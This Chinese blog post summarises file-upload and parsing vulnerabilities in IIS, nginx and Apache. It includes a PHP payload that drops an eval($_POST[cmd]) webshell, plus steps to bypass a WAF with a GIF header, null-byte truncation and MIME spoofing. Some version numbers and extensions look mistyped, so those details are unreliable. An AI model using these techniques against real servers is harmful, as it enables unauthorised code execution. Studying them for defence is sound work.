网络安全|上传漏洞——文件解析漏洞

IIS5.x/6.0

目录解析

上传文件时先创建一个后缀名为相应脚本的文件夹(如:“xx.aps”,“xx.php”等。作用:该文件夹下的任何文件作为aps或php文件执行)

文件解析

上传文件时通过抓包改包的方式将上传文件如xx.asp的文件后缀名改为xx.asp;.jpg变成以图片的格式上传,而IIS解析文件是将文件名从前往后读,会将上传的文件名解析为xx.asp。

IIS7.0/7.5

nginx<8.03畸形解析漏洞

在默认Fast-CGI开启状况下,黑客上传一个名字为xx.jpg,内容为<?PHP fputs(fopen('shell.php','w'),'<?phpeval($_POST[cmd])?>');?>的文件,然后通过上网访问xx.jpg/.php,在这个目录下就会生成一句话木马shell.php。

文件头欺骗漏洞

我们上传一句话木马的时候网站安全狗会检测这个文件的内容或者上传文件的大小。

如当我们以图片格式上传一句话木马时要在文件文本的第一行加上“gif89a”的图片头,检测文件大小不符合图片格式时我们将代码多复制几遍再上传

%00截断

上传xx.jpg的一句话木马文件,通过抓包工具将文件名改为xx.php jpg(请注意php与jpg之间有一个空格),然后再通过16进制编辑将“20”改为“00”(空格的16进制为20)。

Filepath漏洞

如上传文件格式为“xx.jpg”的文件,通过burp抓包工具将格式image/jpeg改为text/asp,内容改为想要上传的内容。

Apache(linux系统)文件解析漏洞

Apache不能解析rar,owf后缀名。我们可以将上传的文件后缀名改为此类的格式上传达到想要的效果。

免责声明

本篇博客是自己通过视频学习得出的一些总结,如有雷同请通知官方删除博客。

END

主 编 | 张祯悦

责 编 | 官学琦

where2go 团队


微信号:算法与编程之美

长按识别二维码关注我们!

温馨提示:点击页面右下角“写留言”发表评论,期待您的参与!期待您的转发!

本文分享自微信公众号 - 算法与编程之美(algo_coding)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-10-15

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

扫码关注云+社区

领取腾讯云代金券